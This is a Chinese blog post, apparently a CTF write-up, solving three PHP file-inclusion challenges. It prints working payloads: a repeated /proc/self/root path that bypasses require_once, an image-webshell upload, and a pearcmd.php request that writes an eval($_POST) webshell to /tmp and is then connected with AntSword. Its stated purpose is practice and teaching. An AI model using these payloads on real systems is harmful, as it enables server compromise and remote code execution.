文件包含漏洞三道题

最新推荐文章于 2024-04-23 02:34:03 发布
最新推荐文章于 2024-04-23 02:34:03 发布
阅读量1.5k 收藏 2
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qz362228/article/details/124524296
版权

1.绕过require_once限制

题目页面:在这里插入图片描述
有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flagthis_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制
因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php

url=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/file_include/Assess01/this_is_flag.php

得到base64编码后的值
在这里插入图片描述
解码得flag{This_ls_fl@g}
在这里插入图片描述

2.图片马连接shell

上传图片马,然后用webshell工具连接即得flag
在这里插入图片描述

在这里插入图片描述

3.php裸文件包含—利用pearcmd

利用pearcmd进行文件包含
php裸文件包含
需要用bp发包,要不然直接在浏览器发的话部分特殊字符可能会被url转码
在这里插入图片描述

?+config-create+/&path=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST[x]);?>+/tmp/ccc.php

再用蚁剑连接
在这里插入图片描述
得flag=flag{Th1s_PeArCMD_d0t_pHp};在这里插入图片描述

乔治777
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1634
文章目录前言一、目描述二、解步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 目分类: CTF—Web文件包含—03—require_once 一、目描述 目: b-11-未写完的网站 二、解步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:目逻辑: info.php页面中的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
文件包含漏洞
wobushini的博客
01-21 285
php文件包含漏洞,环境为phpstudy php文件包含分为本地包含和远程包含,导致文件包含的函数有: include(); include_once(); require(); require_once(); fopen(); readfile(); 一、 php本地文件包含漏洞(LFI)(使用include函数) 1、先来看一个简单的页面 新建一个phpinfo.txt: 再新建一个she...
apache不能解析php文件_php源码分析 require_once 绕过不能重复包含文件的限制
weixin_39530509的博客
11-23 338
简介众所周知,在php中,require_once在调用时php会检查该文件是否已经被包含过,如果是则不会再次包含,那么我们可以尝试绕过这个机制吗?不写入webshell只读文件有办法吗?...
利用pearcmd.php文件包含getshell
最新发布
m0_59053674的博客
04-23 1310
文章介绍如何利用pearcmd来getshel,并对payload的构造格式提出了一点想法
[CTF]proc目录的应用
cosmoslin的博客
01-24 2233
proc目录的运用 /proc目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc 是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 简单来讲,/proc 目录即保存在系统内存中的信息,大多数虚拟文件可以使用文件查看命令如cat、more或者less进行查看,有些文件信息表述的内容可以一目了然,但也有文
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2304
基本原理
第七式 七伤拳 web安全文件包含漏洞.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞
计算机三级网络技术库.doc
12-01
这道考察了点-点式网络的基本概念和特点。点-点式网络是一种基本的网络结构,将多个结点连接起来,实现数据的传输和通信。在点-点式网络中,一条通信线路只能连接两个结点,如果两个结点之间没有直接连接的线路,...
SICTF 2023 真
09-10
10. **W1-[签到]Include**:与C1类似,可能是Web安全领域的一个签到目,"Include"可能与服务器端的文件包含漏洞有关。 通过对这些文件名的分析,我们可以看出SICTF 2023的挑战涵盖了Web安全、密码学、逆向工程、...
Imaginary CTF 2022 真
08-01
参赛者需要熟悉HTTP协议、Web应用程序架构以及常见的漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等。挑战可能要求参赛者找到并利用网站的漏洞以获取敏感信息或控制服务器。 4. **权限提升(Pwn)**:这一类...
常考渗透测试面试.pdf
09-29
* PHP框架:使用LFI漏洞,限制文件包含,监控文件访问。 中间件解析漏洞 * Redis未授权访问漏洞:攻击者可以访问Redis服务器,获取敏感数据。 * Tomcat安全加固:限制用户权限,监控用户行为,使用WAF防止恶意攻击...
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2288
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1077
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
CTF——Web——文件包含漏洞
热门推荐
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
文件漏洞目搜集
Devil_B的博客
05-14 647
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 目内容: 没错!就是文件包含漏洞。 解知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
PHP文件包含漏洞复现
春日野穹
09-17 2949
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
NSSCTF Round#8 web专项赛
qq_61768489的博客
02-13 1036
文件包含
自制几道有关代码审计的选择
04-10
我很乐意帮您回答问。以下是几道有关代码审计的选择: 1. 代码审计是一种用来检查和分析软件应用程序代码的方法,它的主要目的是: A. 修复程序中的漏洞 B. 评估软件的功能 C. 优化程序的性能 D. 增强软件的用户体验 答案:A. 修复程序中的漏洞 2. 哪些类型的漏洞可以通过代码审计检测出来? A. 数据库注入 B. 跨站脚本攻击 C. 文件包含 D. 所有答案都正确 答案:D. 所有答案都正确 3. 代码审计是通过对程序代码的什么部分进行分析来检测漏洞的? A. 只分析核心模块 B. 只分析关键模块 C. 分析所有模块 D. 只分析用户界面 答案:C. 分析所有模块 希望这些选择可以帮助您更好地了解代码审计。如果您有其他问,请随时提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值